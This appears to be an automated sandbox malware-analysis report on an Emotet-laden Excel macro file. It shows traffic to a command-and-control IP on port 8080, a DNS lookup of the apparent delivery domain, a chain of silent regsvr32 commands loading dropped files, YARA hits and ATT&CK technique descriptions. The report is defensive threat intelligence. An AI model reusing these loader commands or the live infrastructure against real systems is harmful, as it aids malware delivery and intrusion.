Feb 24, 2022 13:54:42.891010046 CET	8080	49168	135.148.121.246	192.168.2.22
Feb 24, 2022 13:54:42.891130924 CET	49168	8080	192.168.2.22	135.148.121.246
Feb 24, 2022 13:54:46.432123899 CET	49168	8080	192.168.2.22	135.148.121.246
Feb 24, 2022 13:54:46.575891018 CET	8080	49168	135.148.121.246	192.168.2.22
Feb 24, 2022 13:54:46.977751017 CET	8080	49168	135.148.121.246	192.168.2.22
Feb 24, 2022 13:54:46.977863073 CET	49168	8080	192.168.2.22	135.148.121.246
Feb 24, 2022 13:54:49.976819038 CET	8080	49168	135.148.121.246	192.168.2.22
Feb 24, 2022 13:54:49.976846933 CET	8080	49168	135.148.121.246	192.168.2.22
Feb 24, 2022 13:54:49.976926088 CET	49168	8080	192.168.2.22	135.148.121.246
Feb 24, 2022 13:54:49.976963043 CET	49168	8080	192.168.2.22	135.148.121.246

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 24, 2022 13:54:08.191229105 CET	52167	53	192.168.2.22	8.8.8.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 24, 2022 13:54:08.191229105 CET	192.168.2.22	8.8.8.8	0xaa77	Standard query (0)	www.swaong.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Type	Class
Feb 24, 2022 13:54:08.260437012 CET	8.8.8.8	192.168.2.22	0xaa77	No error (0)	www.swaong.com	swaong-home.azurewebsites.net	CNAME (Canonical name)	IN (0x0001)
Feb 24, 2022 13:54:08.260437012 CET	8.8.8.8	192.168.2.22	0xaa77	No error (0)	swaong-home.azurewebsites.net	waws-prod-dm1-143.sip.azurewebsites.windows.net	CNAME (Canonical name)	IN (0x0001)
Feb 24, 2022 13:54:08.260437012 CET	8.8.8.8	192.168.2.22	0xaa77	No error (0)	waws-prod-dm1-143.sip.azurewebsites.windows.net	waws-prod-dm1-143.cloudapp.net	CNAME (Canonical name)	IN (0x0001)

Target ID:	0
Start time:	13:53:18
Start date:	24/02/2022
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Imagebase:	0x13f170000
File size:	28253536 bytes
MD5 hash:	D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: regsvr32.exePID: 1220, Parent PID: 1592

General

Target ID:	3
Start time:	13:53:29
Start date:	24/02/2022
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWow64\regsvr32.exe /s ..\xxw1.ocx
Imagebase:	0xfc0000
File size:	14848 bytes
MD5 hash:	432BE6CF7311062633459EEF6B242FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.435154889.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Analysis Process: regsvr32.exePID: 2216, Parent PID: 1220

General

Target ID:	4
Start time:	13:53:31
Start date:	24/02/2022
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Lublsqnpkfxznyn\qzdpzpnlmhwmidn.sqj"
Imagebase:	0xfc0000
File size:	14848 bytes
MD5 hash:	432BE6CF7311062633459EEF6B242FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.445708809.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.445844665.0000000000231000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Analysis Process: regsvr32.exePID: 2580, Parent PID: 2216

General

Target ID:	5
Start time:	13:53:35
Start date:	24/02/2022
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Akqqkkcyjpzjtkdl\yjsihfoifzocxh.bje"
Imagebase:	0xfc0000
File size:	14848 bytes
MD5 hash:	432BE6CF7311062633459EEF6B242FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.451757926.0000000000301000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.451639810.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Analysis Process: regsvr32.exePID: 2188, Parent PID: 2580

General

Target ID:	6
Start time:	13:53:39
Start date:	24/02/2022
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Jlwcmhlugcekbvod\wgwqcgkqco.zkn"
Imagebase:	0xfc0000
File size:	14848 bytes
MD5 hash:	432BE6CF7311062633459EEF6B242FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.457525163.00000000008D1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.457498778.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Analysis Process: regsvr32.exePID: 2600, Parent PID: 2188

General

Target ID:	7
Start time:	13:53:41
Start date:	24/02/2022
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Wjoyn\vwxqtwr.dtt"
Imagebase:	0xfc0000
File size:	14848 bytes
MD5 hash:	432BE6CF7311062633459EEF6B242FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.462225822.0000000000201000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.462181637.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Analysis Process: regsvr32.exePID: 1832, Parent PID: 2600

General

Target ID:	8
Start time:	13:53:43
Start date:	24/02/2022
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Fypgzmyquzzcde\otyatzrmngwq.ngt"
Imagebase:	0xfc0000
File size:	14848 bytes
MD5 hash:	432BE6CF7311062633459EEF6B242FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.467760078.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.467692271.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Analysis Process: regsvr32.exePID: 3000, Parent PID: 1832

General

Target ID:	9
Start time:	13:53:46
Start date:	24/02/2022
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Bwfagqlayjve\vhxv.yyo"
Imagebase:	0xfc0000
File size:	14848 bytes
MD5 hash:	432BE6CF7311062633459EEF6B242FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.472981981.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.473013320.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Analysis Process: regsvr32.exePID: 2684, Parent PID: 3000

General

Target ID:	10
Start time:	13:53:49
Start date:	24/02/2022
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Wajwuevzvdakzef\rsarmrhrfymvh.bdv"
Imagebase:	0xfc0000
File size:	14848 bytes
MD5 hash:	432BE6CF7311062633459EEF6B242FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.482255852.0000000000261000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.482238250.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Analysis Process: regsvr32.exePID: 2092, Parent PID: 2684

General

Target ID:	11
Start time:	13:53:53
Start date:	24/02/2022
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Qqnrprjtrrtdhqc\hwfqlqeqb.xee"
Imagebase:	0xfc0000
File size:	14848 bytes
MD5 hash:	432BE6CF7311062633459EEF6B242FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.711848571.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.711876622.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Disassembly

⊘No disassembly

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Documento.xlsm

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Emotet

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\BRqk58WkNweubruYwrLOt[1].dll

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3429A7BE.jpeg

C:\Users\user\AppData\Local\Temp\8833.tmp

C:\Users\user\AppData\Local\Temp\Cab38BB.tmp

C:\Users\user\AppData\Local\Temp\Tar38BC.tmp

C:\Users\user\AppData\Local\Temp\~DF214DADA29E525B4F.TMP

C:\Users\user\Desktop\~$Documento.xlsm

C:\Users\user\xxw1.ocx

C:\Windows\SysWOW64\Lublsqnpkfxznyn\qzdpzpnlmhwmidn.sqj (copy)

Static File Info

General

Windows Analysis Report
Documento.xlsm

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre